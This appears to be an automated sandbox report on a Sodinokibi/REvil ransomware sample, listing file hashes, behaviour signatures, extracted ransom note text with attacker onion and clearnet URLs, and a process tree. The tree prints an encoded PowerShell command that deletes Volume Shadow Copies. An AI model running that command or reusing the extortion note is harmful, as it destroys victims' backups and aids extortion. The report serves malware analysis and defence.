Analysis

  • max time kernel
    147s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    07-09-2024 22:22

General

  • Target

    d2f4275c5c0ed02ac27c5c502fabeaec_JaffaCakes118.exe

  • Size

    165KB

  • MD5

    d2f4275c5c0ed02ac27c5c502fabeaec

  • SHA1

    24d68dde7bf39797ac7c03a39b5f11d36957834f

  • SHA256

    4e5c233cf1270e2dac1a35ab36907ee23189fd424625fbcd7da10e49e7ae331c

  • SHA512

    a1e3240b0ef8347f30885741f553ac43cf17ec1b7d179aaf396707a017a4ee8b9dba28a58bfdfe7b7092e320b44daef754f24fbb0a1d41998c3918fcdeb841fa

  • SSDEEP

    3072:dopp2Xda3yJQZiiykM2pngXEOkzMvo3qBVj:dGp3zZiXkMEnSEVzMQaz

Malware Config

Extracted

Path

C:\Users\9e28nf86-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 9e28nf86. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/352ABE9B61DEBAA2 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/352ABE9B61DEBAA2 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: p/6u5biMG3KDDkuWviL1v2di1eztkuYiFBIKRPJBoFO/PPR4XFYoX0wqLoszJ58t bXLnDXiM66r8M/f6CBK9p2lSAMZkJ6EWwKw+NgSqw7vDZ4FGAPcrtEKOmrMkONJI sil4nzL6vGcHiWE5c3p4ynf/VGSzwY6ntRpWkncpfxUpFe82d3acEn2O7Dr+63am BmDSTToEf2xsAPaDMNqkFbQD1a2waIBhse/dUkNaVQ5URkYAU4Bh3Mo9b7/wHIQc dEWx9NhK8ffW7JAh0QD576g28xghnJ963mi0tKoBWHL3NpVtulCsklDH4LDa9wMc 4uO9j5jaifpN/vkc4JprjclE6PlmKXaCPn6eUZwVunnNQpddeg0Ms6OaGrnevmie fktrzYxyHPKZDEa6jpke4oPpDKjMqa1UME/eybhSRawlfKzJ8Ksl1g+bbLmzcRkJ VkNZwRo5haQ1g69uRDO1r/QvaAymxZKi1tPdXM+opCrTrE8SZFpavaI4YiAo5idg vbGZR5Nh6nK6TIrRRfbollAHw+iqfJ7ZunpR/Or/DwbzFsqo70oBSVUuXLdaFHi5 VqvQQtZKpKcC+2w88gbC+J0JITJ0/+N0bFiJAHGe/YJX1ZimpFSmJokmYsp40HNP gKFDvUrZWGcUvlqErLmsoA5WLSCexl8zvxbTISIDt2kODe55Ji0UA9WIiGk+12wC W4YEYuj0OW/aBlZETnLt2lKb9xpuwflBDo7rZwKbfwWLDnWnQyeI1lwwbfz7g+eg v7+FetSybUwtQrRYh2dDoTUwHLgChGYqrGaau1lxyILUM8t0okV0YrKu8JLjmbmn c2ud67OVnWV7c0N3soVEjm7IJLDx1sJBKzU+TzJZmiZQIc9P7yIuaMUJ6af+OU5b d8YLxcJDNVc5H0MK5CnIFUCyyVocBwDsqBU2B6lWLhKtQjvChisA5zl7Ukm3nkiS yV5q9mPrhh+kfJUAcbjzBiH8ZyZzMnn7rZXv5YdWcXz5M6jzDJyIVMTZ+1EPNBCI Ee20chrZkuLTcXLUobKtcFs9RZMHmohUMs+lAmRG8kSN+N9Vbz/+rmfx9CAw2Irm oQ1zSkiQ3gTm+UFDP0aEGUU53Y+K+1uDOdZeAA3wX95O+XMdxzUZqdOL+TWMJDet 44WyNBkBDfl+uZOzgG1ABDN1VBmkxe3CtjqX+wfYQkqrVzqKATF5EauEli3DC2W4 en+ehVDvVCwypizaX3b97A== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/352ABE9B61DEBAA2

http://decryptor.cc/352ABE9B61DEBAA2

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 19 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\d2f4275c5c0ed02ac27c5c502fabeaec_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\d2f4275c5c0ed02ac27c5c502fabeaec_JaffaCakes118.exe"
    1⤵
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1884
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:348
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2276
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2212

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\9e28nf86-readme.txt

      Filesize

      6KB

      MD5

      6ae4b5bd0f09ef97a65eabbae9d1b9f8

      SHA1

      0ca960599cc99d5a9099abec71532f333b532d44

      SHA256

      82ba8d5a537e7c58c1af23a361584a5415dbc3c6e52a75577363821b7eb85915

      SHA512

      98b8ed6be28cfda428fac11c70ed08cd2a2281cb2fce9f7c9d0a15e57e2b1f9515beba5cdc8447f6b2357d1ae10449fb4b704d7be89e75889f64b4afdfeab5b2

    • C:\Users\Admin\AppData\Local\Temp\Cab5488.tmp

      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    • C:\Users\Admin\AppData\Local\Temp\Tar549B.tmp

      Filesize

      181KB

      MD5

      4ea6026cf93ec6338144661bf1202cd1

      SHA1

      a1dec9044f750ad887935a01430bf49322fbdcb7

      SHA256

      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

      SHA512

      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    • C:\Windows\System32\catroot2\dberr.txt

      Filesize

      191KB

      MD5

      bfb639d3d0900af79b1aee248b4b5115

      SHA1

      2e76abb74a33a486890685b6b383a9d17afb223d

      SHA256

      d2d140330f4cf4575330a4842bc480bb1b0a307bcf82b8c8266b10b717cfbe47

      SHA512

      6dbcc4f66e97ebd57602cad5f2ecd3a8506fe9050f81861e059e0f4e25962661de0747c621bcea1032b6e5e1ef132e0fbda59a89c8176ca3385a02bb37ede897

    • memory/348-8-0x000007FEF5B70000-0x000007FEF650D000-memory.dmp

      Filesize

      9.6MB

    • memory/348-9-0x000007FEF5B70000-0x000007FEF650D000-memory.dmp

      Filesize

      9.6MB

    • memory/348-10-0x000007FEF5B70000-0x000007FEF650D000-memory.dmp

      Filesize

      9.6MB

    • memory/348-11-0x000007FEF5B70000-0x000007FEF650D000-memory.dmp

      Filesize

      9.6MB

    • memory/348-12-0x000007FEF5B70000-0x000007FEF650D000-memory.dmp

      Filesize

      9.6MB

    • memory/348-6-0x0000000002250000-0x0000000002258000-memory.dmp

      Filesize

      32KB

    • memory/348-4-0x000007FEF5E2E000-0x000007FEF5E2F000-memory.dmp

      Filesize

      4KB

    • memory/348-7-0x000007FEF5B70000-0x000007FEF650D000-memory.dmp

      Filesize

      9.6MB

    • memory/348-5-0x000000001B730000-0x000000001BA12000-memory.dmp

      Filesize

      2.9MB